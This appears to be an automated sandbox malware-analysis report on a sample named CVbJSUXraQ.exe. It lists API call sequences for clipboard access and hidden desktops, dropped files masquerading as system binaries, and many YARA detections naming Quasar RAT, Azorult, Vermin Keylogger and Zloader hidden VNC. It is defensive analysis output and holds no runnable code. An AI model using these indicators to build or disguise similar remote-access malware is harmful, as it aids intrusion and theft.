                      Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,5_2_00C83CC0
                      Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00C83A94 GetWindowLongPtrA,SendNotifyMessageA,GetClipboardOwner,OpenClipboard,GetClipboardData,GlobalLock,lstrlenA,lstrlenA,HeapAlloc,lstrlenA,lstrlenA,HeapFree,GlobalUnlock,CloseClipboard,SendNotifyMessageA,SetWindowLongPtrA,DefWindowProcA,5_2_00C83A94
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 1_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00E3CABC
                      Source: C:\Users\user\Desktop\CVbJSUXraQ.exe | Code function: 7_2_00E3CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,7_2_00E3CABC
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Code function: 10_2_00ACCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00ACCABC

                      E-Banking Fraud:

                      Yara detected Quasar RAT
                      Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
                      Source: Yara match | File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
                      Source: Yara matchFile source: dropped/windef.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
                      Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C7D800 CreateDesktopA,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,ReleaseDC,lstrcpyA,CloseDesktop,5_2_00C7D800

                      System Summary:

                      Malicious sample detected (through community Yara rule)
                      Source: CVbJSUXraQ.exe, type: SAMPLE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: CVbJSUXraQ.exe, type: SAMPLE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: CVbJSUXraQ.exe, type: SAMPLE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload; Author: kevoreilly
                      Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload; Author: kevoreilly
                      Source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload; Author: kevoreilly
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects malware from disclosed CN malware set; Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE; Matched rule: Azorult Payload; Author: kevoreilly
                      Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Zloader hidden VNC; Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Vermin Keylogger; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Patchwork malware; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects Quasar RAT; Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects QuasarRAT malware; Author: Florian Roth
